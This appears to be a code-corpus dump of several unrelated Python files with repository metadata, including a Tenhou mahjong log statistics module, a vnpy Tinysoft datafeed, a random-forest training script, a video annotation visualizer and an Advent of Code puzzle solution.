self._debug['script_pub_key']['start'] = self._io.pos()
self.script_pub_key = self._io.read_bytes(self.len_script)
self._debug['script_pub_key']['end'] = self._io.pos()
| 0
| 0
| 0
| 10,206
| 0
| 0
| 0
| 36
| 89
|
3a917aec646616b14d05103f2a853a51a6359d7f
| 459
|
py
|
Python
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 772
|
2015-01-17T09:11:07.000Z
|
2022-03-23T08:50:31.000Z
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 50
|
2015-03-12T14:33:51.000Z
|
2022-03-10T07:58:54.000Z
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 110
|
2015-01-30T07:27:23.000Z
|
2021-12-15T07:22:20.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2018 Ben Kurtovic <[email protected]>
# Released under the terms of the MIT License. See LICENSE for details.
from __future__ import print_function, unicode_literals
| 30.6
| 71
| 0.736383
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2018 Ben Kurtovic <[email protected]>
# Released under the terms of the MIT License. See LICENSE for details.
from __future__ import print_function, unicode_literals
from gitup import config
def test_empty_list(tmpdir, capsys):
config_path = tmpdir / "config"
config.list_bookmarks(config_path)
captured = capsys.readouterr()
assert captured.out == "You have no bookmarks to display.\n"
| 0
| 0
| 0
| 0
| 0
| 190
| 0
| 3
| 46
|
8d619e7f57b45654b3e4b1e082e471adaafd8081
| 596
|
py
|
Python
|
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
from random import randint
cg = CG()
n=20
c = [[Var("int") for i in range(n)] for i in range(n)]
a = [[Var("int") for i in range(n)] for i in range(n)]
b = [[Var("int") for i in range(n)] for i in range(n)]
m=100
for vs in a:
for v in vs:
cg.init(v, randint(0,m))
for vs in b:
for v in vs:
cg.init(v, randint(0,m))
for i in range(n):
for j in range(n):
cg.init(c[i][j], 0)
for k in range(n):
tmp = Var("int")
cg.op_mul(tmp, a[i][k], b[k][j])
cg.op_add(c[i][j], c[i][j], tmp)
cg.print_code()
| 19.225806
| 54
| 0.510067
|
from cg import *
from random import randint
cg = CG()
n=20
c = [[Var("int") for i in range(n)] for i in range(n)]
a = [[Var("int") for i in range(n)] for i in range(n)]
b = [[Var("int") for i in range(n)] for i in range(n)]
m=100
for vs in a:
for v in vs:
cg.init(v, randint(0,m))
for vs in b:
for v in vs:
cg.init(v, randint(0,m))
for i in range(n):
for j in range(n):
cg.init(c[i][j], 0)
for k in range(n):
tmp = Var("int")
cg.op_mul(tmp, a[i][k], b[k][j])
cg.op_add(c[i][j], c[i][j], tmp)
cg.print_code()
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| -5
| 22
|
d00adb83565673cb264520ebee0b3eda48e2f0c5
| 2,523
|
py
|
Python
|
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
import os.path
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
from sklearn.ensemble import RandomForestRegressor
from hyperparameter_tuning.study_functions import load_study
from root import ROOT_DIR
from weighted_mean_prediction.data_setup import get_encoded_split_data
from weighted_mean_prediction.model_storage import load_model
if __name__ == "__main__":
study_dir = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/studies"
study_name = f"rf_study2.joblib"
study_path = os.path.join(study_dir, study_name)
model_name = "rf2.joblib"
model_path = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/models/{model_name}"
X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()
X_train = pd.concat([X_train, X_val])
y_train = pd.concat([y_train, y_val])
study = load_study(study_path)
rf: RandomForestRegressor = load_model(model_path)
if rf is None:
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
else:
if not is_same_params(study.best_params, rf.get_params()):
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
train_acc = rf.score(X_train, y_train)
test_acc = rf.score(X_test, y_test)
print(train_acc, test_acc)
for idx, importance in enumerate(rf.feature_importances_):
print(f"{X_train.columns[idx]} : {importance}")
# plot_rf_feature_importances(rf.feature_importances_)
predictions = rf.predict(X_test)
mape = metrics.mean_absolute_percentage_error(predictions, y_test)
mse = metrics.mean_squared_error(predictions, y_test)
print("\nMAPE = ", mape)
print("MSE = ", mse)
plt.scatter(range(len(predictions[:100])), predictions[:100])
plt.scatter(range(len(y_test[:100])), y_test[:100])
plt.show()
| 37.656716
| 100
| 0.738407
|
import os.path
from typing import Dict
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
from sklearn.ensemble import RandomForestRegressor
from hyperparameter_tuning.study_functions import load_study
from root import ROOT_DIR
from weighted_mean_prediction.data_setup import get_encoded_split_data
from weighted_mean_prediction.model_storage import load_model, save_model
from weighted_mean_prediction.regression_performance import plot_rf_feature_importances
def is_same_params(study_params: Dict[str, object],
model_params: Dict[str, object]) -> bool:
return all([study_params[p] == model_params[p] for p in study_params.keys()])
def train_tuned_model(model_params: Dict[str, object], X_train: pd.DataFrame, y_train: pd.DataFrame,
file_path: str) -> RandomForestRegressor:
model = RandomForestRegressor(**model_params, random_state=0)
model.fit(X_train, y_train)
save_model(model, file_path)
return model
if __name__ == "__main__":
study_dir = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/studies"
study_name = f"rf_study2.joblib"
study_path = os.path.join(study_dir, study_name)
model_name = "rf2.joblib"
model_path = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/models/{model_name}"
X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()
X_train = pd.concat([X_train, X_val])
y_train = pd.concat([y_train, y_val])
study = load_study(study_path)
rf: RandomForestRegressor = load_model(model_path)
if rf is None:
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
else:
if not is_same_params(study.best_params, rf.get_params()):
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
train_acc = rf.score(X_train, y_train)
test_acc = rf.score(X_test, y_test)
print(train_acc, test_acc)
for idx, importance in enumerate(rf.feature_importances_):
print(f"{X_train.columns[idx]} : {importance}")
# plot_rf_feature_importances(rf.feature_importances_)
predictions = rf.predict(X_test)
mape = metrics.mean_absolute_percentage_error(predictions, y_test)
mse = metrics.mean_squared_error(predictions, y_test)
print("\nMAPE = ", mape)
print("MSE = ", mse)
plt.scatter(range(len(predictions[:100])), predictions[:100])
plt.scatter(range(len(y_test[:100])), y_test[:100])
plt.show()
| 0
| 0
| 0
| 0
| 0
| 464
| 0
| 80
| 90
|
0278f07d5c4fcf43dea6388a703c9cfa378a80f3
| 4,464
|
py
|
Python
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
weijiawu/BOVText-Benchmark
|
375cc1c72e20fb751e17a33c74fc4ca5c1557389
|
[
"CC-BY-4.0"
] | 24
|
2021-10-12T04:02:31.000Z
|
2022-03-31T07:19:17.000Z
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
maoxiaofei99/BOVText-Benchmark
|
880342867704f8be78fb8f8e1615a234a287a574
|
[
"CC-BY-4.0"
] | 1
|
2021-10-12T04:06:14.000Z
|
2021-10-12T04:06:14.000Z
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
maoxiaofei99/BOVText-Benchmark
|
880342867704f8be78fb8f8e1615a234a287a574
|
[
"CC-BY-4.0"
] | 5
|
2021-11-29T05:18:36.000Z
|
2022-02-27T02:22:47.000Z
|
# -*- coding: utf-8 -*-
import cv2
import os
import numpy as np
# import Levenshtein
from cv2 import VideoWriter_fourcc
from tqdm import tqdm
import shutil
def Frames2Video(frames_dir=""):
''' frames_dir '''
img_root = frames_dir #'E:\\KSText\\videos_frames\\video_14_6'
image = cv2.imread(os.path.join(img_root,"1.jpg"))
h,w,_ = image.shape
out_root = frames_dir+".avi"
# Edit each frame's appearing time!
fps = 20
fourcc = VideoWriter_fourcc(*"MJPG") # jpg
videoWriter = cv2.VideoWriter(out_root, fourcc, fps, (w, h))
im_names = os.listdir(img_root)
num_frames = len(im_names)
print(len(im_names))
for im_name in tqdm(range(1, num_frames+1)):
string = os.path.join( img_root, str(im_name) + '.jpg')
# print(string)
frame = cv2.imread(string)
# frame = cv2.resize(frame, (w, h))
videoWriter.write(frame)
videoWriter.release()
shutil.rmtree(img_root)
if __name__ == "__main__":
root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Video_Frame"
json_root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Annotation"
result_path_cls = "./vis"
seqs = ["48901770165" , "49004756658" , "49287498737", "49424491900", "49466537994", "49552222543","49983613955","Cls18_1","Cls26_1","demo"]
for video_name in tqdm(os.listdir(json_root)):
annotation_path_ = os.path.join(json_root, video_name)
video_path_ = os.path.join(root, video_name.split(".json")[0])
annotation = get_annotation(annotation_path_)
if video_name.split(".json")[0] in seqs:
continue
result_path_cls_video = os.path.join(result_path_cls, video_name.split(".json")[0])
if not os.path.exists(result_path_cls_video):
os.makedirs(result_path_cls_video)
else:
continue
for frame_id in annotation.keys():
frame_name = video_name.split(".json")[0] + "_" + frame_id.zfill(6) + ".jpg"
frame_path = os.path.join(video_path_,frame_name)
frame = cv2.imread(frame_path)
# print(frame_path)
annotatation_frame = annotation[frame_id]
for data in annotatation_frame:
x1,y1,x2,y2,x3,y3,x4,y4,ID, content,is_caption = data
# print(data)
id_content = str(content) + " " + str(ID)
# print(id_content)
# print(frame.shape)
if is_caption == "scene":
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 0, 255), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
else:
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 255, 0), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
# if not os.path.exists(result_path):
# os.makedirs(result_path)
frame_vis_path = os.path.join(result_path_cls_video, frame_id+".jpg")
cv2.imwrite(frame_vis_path, frame)
# video_vis_path = "./"
Frames2Video(frames_dir=result_path_cls_video)
# break
# break
| 35.428571
| 144
| 0.600582
|
# -*- coding: utf-8 -*-
import cv2
import os
import copy
import numpy as np
import math
# import Levenshtein
from cv2 import VideoWriter, VideoWriter_fourcc
import json
from tqdm import tqdm
from PIL import Image, ImageDraw, ImageFont
import shutil
def Frames2Video(frames_dir=""):
''' 将frames_dir下面的所有视频帧合成一个视频 '''
img_root = frames_dir #'E:\\KSText\\videos_frames\\video_14_6'
image = cv2.imread(os.path.join(img_root,"1.jpg"))
h,w,_ = image.shape
out_root = frames_dir+".avi"
# Edit each frame's appearing time!
fps = 20
fourcc = VideoWriter_fourcc(*"MJPG") # 支持jpg
videoWriter = cv2.VideoWriter(out_root, fourcc, fps, (w, h))
im_names = os.listdir(img_root)
num_frames = len(im_names)
print(len(im_names))
for im_name in tqdm(range(1, num_frames+1)):
string = os.path.join( img_root, str(im_name) + '.jpg')
# print(string)
frame = cv2.imread(string)
# frame = cv2.resize(frame, (w, h))
videoWriter.write(frame)
videoWriter.release()
shutil.rmtree(img_root)
def get_annotation(video_path):
annotation = {}
with open(video_path,'r',encoding='utf-8-sig') as load_f:
gt = json.load(load_f)
for child in gt:
lines = gt[child]
annotation.update({child:lines})
return annotation
def cv2AddChineseText(img, text, position, textColor=(0, 255, 0), textSize=30):
if (isinstance(img, np.ndarray)): # 判断是否OpenCV图片类型
img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
# 创建一个可以在给定图像上绘图的对象
draw = ImageDraw.Draw(img)
# 字体的格式
fontStyle = ImageFont.truetype(
"./simsun.ttc", textSize, encoding="utf-8")
# 绘制文本
draw.text(position, text, textColor, font=fontStyle)
# 转换回OpenCV格式
return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
if __name__ == "__main__":
root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Video_Frame"
json_root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Annotation"
result_path_cls = "./vis"
seqs = ["48901770165" , "49004756658" , "49287498737", "49424491900", "49466537994", "49552222543","49983613955","Cls18_1","Cls26_1","demo"]
for video_name in tqdm(os.listdir(json_root)):
annotation_path_ = os.path.join(json_root, video_name)
video_path_ = os.path.join(root, video_name.split(".json")[0])
annotation = get_annotation(annotation_path_)
if video_name.split(".json")[0] in seqs:
continue
result_path_cls_video = os.path.join(result_path_cls, video_name.split(".json")[0])
if not os.path.exists(result_path_cls_video):
os.makedirs(result_path_cls_video)
else:
continue
for frame_id in annotation.keys():
frame_name = video_name.split(".json")[0] + "_" + frame_id.zfill(6) + ".jpg"
frame_path = os.path.join(video_path_,frame_name)
frame = cv2.imread(frame_path)
# print(frame_path)
annotatation_frame = annotation[frame_id]
for data in annotatation_frame:
x1,y1,x2,y2,x3,y3,x4,y4,ID, content,is_caption = data
# print(data)
id_content = str(content) + " " + str(ID)
# print(id_content)
# print(frame.shape)
if is_caption == "scene":
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 0, 255), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
else:
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 255, 0), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
# if not os.path.exists(result_path):
# os.makedirs(result_path)
frame_vis_path = os.path.join(result_path_cls_video, frame_id+".jpg")
cv2.imwrite(frame_vis_path, frame)
# video_vis_path = "./"
Frames2Video(frames_dir=result_path_cls_video)
# break
# break
| 168
| 0
| 0
| 0
| 0
| 686
| 0
| 5
| 138
|
132e0421e9b24a450962f82bb4efb1ae59d84d80
| 5,814
|
py
|
Python
|
vnpy_tinysoft/tinysoft_datafeed.py
|
noranhe/vnpy_tinysoft
|
aaa00679adf93b40710e03113411adc24a98a038
|
[
"MIT"
] | null | null | null |
vnpy_tinysoft/tinysoft_datafeed.py
|
noranhe/vnpy_tinysoft
|
aaa00679adf93b40710e03113411adc24a98a038
|
[
"MIT"
] | 1
|
2021-10-30T05:32:06.000Z
|
2021-11-01T11:36:15.000Z
|
vnpy_tinysoft/tinysoft_datafeed.py
|
vnpy/vnpy_tinysoft
|
0d97a91251c02f1b2a7e4afd707a2157056605c6
|
[
"MIT"
] | null | null | null |
from datetime import timedelta
from typing import Dict
from pytz import timezone
from vnpy.trader.constant import Exchange, Interval
EXCHANGE_MAP: Dict[Exchange, str] = {
Exchange.SSE: "SH",
Exchange.SZSE: "SZ"
}
INTERVAL_MAP: Dict[Interval, str] = {
Interval.MINUTE: "cy_1m",
Interval.HOUR: "cy_60m",
Interval.DAILY: "cy_day",
}
SHIFT_MAP: Dict[Interval, timedelta] = {
Interval.MINUTE: timedelta(minutes=1),
Interval.HOUR: timedelta(hours=1),
}
CHINA_TZ = timezone("Asia/Shanghai")
| 31.945055
| 133
| 0.491916
|
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from pytz import timezone
from vnpy.trader.setting import SETTINGS
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import BarData, TickData, HistoryRequest
from vnpy.trader.utility import extract_vt_symbol
from vnpy.trader.datafeed import BaseDatafeed
from .pyTSL import Client, DoubleToDatetime
EXCHANGE_MAP: Dict[Exchange, str] = {
Exchange.SSE: "SH",
Exchange.SZSE: "SZ"
}
INTERVAL_MAP: Dict[Interval, str] = {
Interval.MINUTE: "cy_1m",
Interval.HOUR: "cy_60m",
Interval.DAILY: "cy_day",
}
SHIFT_MAP: Dict[Interval, timedelta] = {
Interval.MINUTE: timedelta(minutes=1),
Interval.HOUR: timedelta(hours=1),
}
CHINA_TZ = timezone("Asia/Shanghai")
class TinysoftDatafeed(BaseDatafeed):
"""天软数据服务接口"""
def __init__(self):
""""""
self.username: str = SETTINGS["datafeed.username"]
self.password: str = SETTINGS["datafeed.password"]
self.client: Client = None
self.inited: bool = False
def init(self) -> bool:
"""初始化"""
if self.inited:
return True
self.client = Client(
self.username,
self.password,
"tsl.tinysoft.com.cn",
443
)
n: int = self.client.login()
if n != 1:
return False
self.inited = True
return True
def query_bar_history(self, req: HistoryRequest) -> Optional[List[BarData]]:
"""查询K线数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
tsl_interval: str = INTERVAL_MAP[req.interval]
bars: List[BarData] = []
start_str: str = req.start.strftime("%Y%m%d")
end_str: str = req.end.strftime("%Y%m%d")
cmd: str = (
f"setsysparam(pn_cycle(),{tsl_interval}());"
"return select * from markettable "
f"datekey {start_str}T to {end_str}T "
f"of '{tsl_exchange}{symbol}' end;"
)
result = self.client.exec(cmd)
if not result.error():
data = result.value()
shift: timedelta = SHIFT_MAP.get(req.interval, None)
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
if shift:
dt -= shift
bar: BarData = BarData(
symbol=symbol,
exchange=exchange,
datetime=CHINA_TZ.localize(dt),
interval=req.interval,
open_price=d["open"],
high_price=d["high"],
low_price=d["low"],
close_price=d["close"],
volume=d["vol"],
turnover=d["amount"],
gateway_name="TSL"
)
# 期货则获取持仓量字段
if not tsl_exchange:
bar.open_interest = d["sectional_cjbs"]
bars.append(bar)
return bars
def query_tick_history(self, req: HistoryRequest) -> Optional[List[TickData]]:
"""查询Tick数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
ticks: List[TickData] = []
dt: datetime = req.start
while dt <= req.end:
date_str: str = dt.strftime("%Y%m%d")
cmd: str = f"return select * from tradetable datekey {date_str}T to {date_str}T+16/24 of '{tsl_exchange}{symbol}' end ; "
result = self.client.exec(cmd)
if not result.error():
data = result.value()
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
dt: datetime = CHINA_TZ.localize(dt)
tick: TickData = TickData(
symbol=symbol,
exchange=exchange,
name=d["StockName"],
datetime=dt,
open_price=d["sectional_open"],
high_price=d["sectional_high"],
low_price=d["sectional_low"],
last_price=d["price"],
volume=d["sectional_vol"],
turnover=d["sectional_amount"],
bid_price_1=d["buy1"],
bid_price_2=d["buy2"],
bid_price_3=d["buy3"],
bid_price_4=d["buy4"],
bid_price_5=d["buy5"],
ask_price_1=d["sale1"],
ask_price_2=d["sale2"],
ask_price_3=d["sale3"],
ask_price_4=d["sale4"],
ask_price_5=d["sale5"],
bid_volume_1=d["bc1"],
bid_volume_2=d["bc2"],
bid_volume_3=d["bc3"],
bid_volume_4=d["bc4"],
bid_volume_5=d["bc5"],
ask_volume_1=d["sc1"],
ask_volume_2=d["sc2"],
ask_volume_3=d["sc3"],
ask_volume_4=d["sc4"],
ask_volume_5=d["sc5"],
localtime=dt,
gateway_name="TSL"
)
# 期货则获取持仓量字段
if not tsl_exchange:
tick.open_interest = d["sectional_cjbs"]
ticks.append(tick)
dt += timedelta(days=1)
return ticks
| 120
| 0
| 0
| 4,959
| 0
| 0
| 0
| 162
| 135
|
e2d1dcb2354936fd158943bcf5fefb6597f1fd28
| 1,203
|
py
|
Python
|
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
d8.py
|
sdamashek/adventofcode
|
68b50d16246657313ce491b1b1b047e743f687fa
|
[
"Unlicense"
] | null | null | null |
inp = open('input_d8.txt').read()
arr = [[0 for i in range(50)] for j in range(6)]
for i in inp.split('\n')[:-1]:
if i.startswith('rotate row'):
rotaterow(int(i.split('y=')[1].split(' ')[0]), int(i.split('by ')[1]))
elif i.startswith('rotate column'):
print(i)
rotatecol(int(i.split('x=')[1].split(' ')[0]), int(i.split('by ')[1]))
else:
rect(int(i.split(' ')[1].split('x')[0]), int(i.split('x')[1]))
print(arr)
print(countpixels())
for i in arr:
print(' '.join(map(str,i)))
| 23.134615
| 78
| 0.47714
|
inp = open('input_d8.txt').read()
arr = [[0 for i in range(50)] for j in range(6)]
def rect(x,y):
global arr
for i in range(x):
for j in range(y):
print(i,j)
arr[j][i] = 1
def rotatecol(x,n):
global arr
for _ in range(n):
first = arr[5][x]
for i in range(5,0,-1):
arr[i][x] = arr[i-1][x]
arr[0][x] = first
print(arr)
def rotaterow(y,n):
global arr
for _ in range(n):
first = arr[y][49]
for i in range(49,0,-1):
arr[y][i] = arr[y][i-1]
arr[y][0] = first
print(arr)
def countpixels():
c = 0
for i in range(50):
for j in range(6):
if arr[j][i] == 1:
c += 1
return c
for i in inp.split('\n')[:-1]:
if i.startswith('rotate row'):
rotaterow(int(i.split('y=')[1].split(' ')[0]), int(i.split('by ')[1]))
elif i.startswith('rotate column'):
print(i)
rotatecol(int(i.split('x=')[1].split(' ')[0]), int(i.split('by ')[1]))
else:
rect(int(i.split(' ')[1].split('x')[0]), int(i.split('x')[1]))
print(arr)
print(countpixels())
for i in arr:
print(' '.join(map(str,i)))
| 0
| 0
| 0
| 0
| 0
| 584
| 0
| 0
| 92
|
3d85f4be772c1a036395de1aa5c734416e429682
| 11,772
|
py
|
Python
|
core/tenhou/log.py
|
SakuraSa/TenhouLoggerX
|
7d6bcfb7e22d631673c61321f3af1c05ec011db5
|
[
"MIT"
] | 2
|
2016-09-19T16:33:29.000Z
|
2017-12-09T01:02:39.000Z
|
core/tenhou/log.py
|
SakuraSa/TenhouLoggerX
|
7d6bcfb7e22d631673c61321f3af1c05ec011db5
|
[
"MIT"
] | null | null | null |
core/tenhou/log.py
|
SakuraSa/TenhouLoggerX
|
7d6bcfb7e22d631673c61321f3af1c05ec011db5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
"""
core.tenhou.log
"""
__author__ = 'Rnd495'
import os
import json
import datetime
import urllib
from core.configs import Configs
configs = Configs.instance()
def get_results(ref_list, player_name):
"""
do statistics on given refs for given player
result dict format (example value is avg value on data set 2015/05/15) :
{
fulu_chong : 0.3940,
dama : 0.1165,
win_time : 11.50,
chong : 0.1347,
win : 0.2484,
win_point : 6690,
ends_listening : 0.5170,
fulu : 0.3717,
after_richi : 0.0288,
now_line_days : 3.71,
max_line_days : 16.67,
first_richi : 0.1597,
count : 1000,
}
:param ref_list: ref list
:param player_name: player name
:return: result dict
"""
counter = {}
adder = {}
game_date_text_set = set()
ref_counter = 0
for ref in ref_list:
ref_counter += 1
log = Log(ref)
game_date_text_set.add(log.time.strftime("%Y%m%d"))
player_index = log.get_player_index(player_name)
if player_index < 0:
# should not be here
continue
for sub_log in log.sub_log:
statistics = StatisticForSubLog(sub_log)
results = statistics.get_result(player_index)
for key, value in results.iteritems():
if value is not None:
counter[key] = counter.get(key, 0) + 1
adder[key] = adder.get(key, 0) + value
results = {}
for key, value in counter.iteritems():
results[key] = (adder[key] / float(value)) if value else 0
max_line_days = now_line_days = 0
last_date = None
for date_text in sorted(game_date_text_set):
now_date = datetime.datetime.strptime(date_text, "%Y%m%d")
if last_date:
if int((now_date - last_date).days) <= 1:
now_line_days += 1
max_line_days = max(max_line_days, now_line_days)
else:
now_line_days = 1
last_date = now_date
results['max_line_days'] = max_line_days
results['now_line_days'] = now_line_days
results['count'] = ref_counter
return results
if __name__ == '__main__':
import time
from sqlalchemy import func, desc
from core.models import get_new_session, PlayerLog
session = get_new_session()
counter = func.count(PlayerLog.name)
query = session.query(PlayerLog.name).filter((PlayerLog.lobby == '0000') & (PlayerLog.name != 'NoName')) \
.group_by(PlayerLog.name).having(counter >= 50).order_by(desc(counter))
results = {}
for name in (row[0] for row in query):
start_time = time.time()
query = session.query(PlayerLog.ref).filter((PlayerLog.name == name) & (PlayerLog.lobby == '0000'))
refs = [row[0] for row in query]
results[name] = get_results(refs, name)
size = len(refs)
time_cost = time.time() - start_time
hz = size / time_cost
print '%6d' % size, '%.2fs' % time_cost, '%.2fHz' % hz, name
session.close()
data_lists = {}
for row in results.itervalues():
for key, value in row.iteritems():
data_lists.setdefault(key, []).append(value)
print ''
print '%20s' % 'type', '%6s' % 'avg', '%6s' % 'max', '%6s' % 'min', '%6s' % 'mu'
# import numpy as np
from scipy.stats import norm
# import matplotlib.pyplot as plt
for key, data_list in data_lists.iteritems():
avg = sum(data_list) / float(len(data_list))
mu, std = norm.fit(data_list)
print '%20s' % key, format_data(avg), format_data(max(data_list)), format_data(min(data_list)), format_data(
mu), std
#
# # Plot the histogram.
# plt.hist(data_list, bins=25, normed=True, alpha=0.6, color='g')
#
# # Plot the PDF.
# xmin, xmax = plt.xlim()
# x = np.linspace(xmin, xmax, 100)
# p = norm.pdf(x, mu, std)
# plt.plot(x, p, 'k', linewidth=2)
# title = "%s fit results: mu = %.2f, std = %.2f" % (key, mu, std)
# plt.title(title)
#
# plt.show()
| 29.802532
| 116
| 0.569147
|
#!/usr/bin/env python
# coding=utf-8
"""
core.tenhou.log
"""
__author__ = 'Rnd495'
import os
import json
import datetime
import urllib
from core.configs import Configs
configs = Configs.instance()
class Log(object):
"""
Log
"""
def __init__(self, ref):
with open(Log.get_file_name(ref), 'rb') as file_handle:
self.json = json.load(file_handle)
# cache
self._scores = None
self._rankings = None
@property
def size(self):
return len(self.names)
@property
def sub_log(self):
return self.json['log']
@property
def ref(self):
return self.json['ref']
@property
def rule(self):
return self.json['rule']['disp']
@property
def lobby(self):
return self.ref.split('-')[2]
@property
def rule_code(self):
return self.ref.split('-')[1]
@property
def dans(self):
return self.json['dan']
@property
def names(self):
return self.json['name']
@property
def scores(self):
if not self._scores:
g = iter(self.json['sc'])
self._scores = zip(g, g)
return self._scores
@property
def time(self):
return datetime.datetime.strptime(self.ref[:10], '%Y%m%d%H')
@property
def points(self):
return [point[0] for point in self.scores]
@property
def pts(self):
return [point[1] for point in self.scores]
@property
def rankings(self):
if not self._rankings:
point_sorted = sorted(((point, index) for index, point in enumerate(self.points)), reverse=True)
self._rankings = [None] * len(point_sorted)
for ranking, (_, index) in enumerate(point_sorted):
self._rankings[index] = ranking
return self._rankings
@property
def rates(self):
return self.json['rate']
@staticmethod
def check_exists(ref):
return os.path.exists(Log.get_file_name(ref))
@staticmethod
def get_file_name(ref):
return os.path.join(configs.tenhou_log_dir, '%s.json' % ref)
@staticmethod
def iter_all():
for root, dirs, files in os.walk(configs.tenhou_log_dir):
for file_name in files:
ref = os.path.splitext(file_name)[0]
yield Log(ref)
def get_player_index(self, name):
try:
return self.names.index(name)
except ValueError:
return None
def get_tenhou_link(self, tw_name=None):
base = "/watch/log?"
params = {'ref': self.ref}
for i, name in enumerate(self.names):
if isinstance(name, unicode):
name = name.encode("utf-8")
params['UN%d' % i] = name
tw = None
if tw_name:
tw = self.get_player_index(tw_name)
if tw is not None:
params['tw'] = tw
return base + urllib.urlencode(params)
class StatisticForSubLog(object):
"""
StatisticForSubLog
"""
def __init__(self, sub_log):
self.sub_log = sub_log
self._richi_list = None
self._fulu_list = None
@property
def game_size(self):
return len(self.point_starts)
@property
def game_index(self):
return self.sub_log[0]
@property
def dora_pointers_out(self):
return self.sub_log[2]
@property
def dora_pointers_in(self):
return self.sub_log[3]
@property
def start_cards(self):
return self.sub_log[4:4 + 3 * self.game_size:3]
@property
def cards_ins(self):
return self.sub_log[5:5 + 3 * self.game_size:3]
@property
def cards_outs(self):
return self.sub_log[6:6 + 3 * self.game_size:3]
@property
def result_list(self):
return self.sub_log[16]
@property
def is_agari(self):
return self.result_description == u'和了'
@property
def result_description(self):
return self.result_list[0]
@property
def point_starts(self):
return self.sub_log[1]
@property
def point_changes(self):
return self.result_list[1::2]
@property
def richi_list(self):
if self._richi_list is None:
self._get_player_details()
return self._richi_list
@property
def is_fulu_list(self):
if self._fulu_list is None:
self._get_player_details()
return self._fulu_list
def _get_player_details(self):
self._richi_list = [None] * self.game_size
self._fulu_list = [False] * self.game_size
# scan card outs
for player_index, card_out in enumerate(self.cards_outs):
for time_index, action in enumerate(card_out):
if self._richi_list[player_index] is not None:
break
if self._fulu_list[player_index]:
break
if not isinstance(action, int):
if action.startswith('r'):
self._richi_list[player_index] = (time_index, action)
else:
self._fulu_list[player_index] = True
# scan card ins
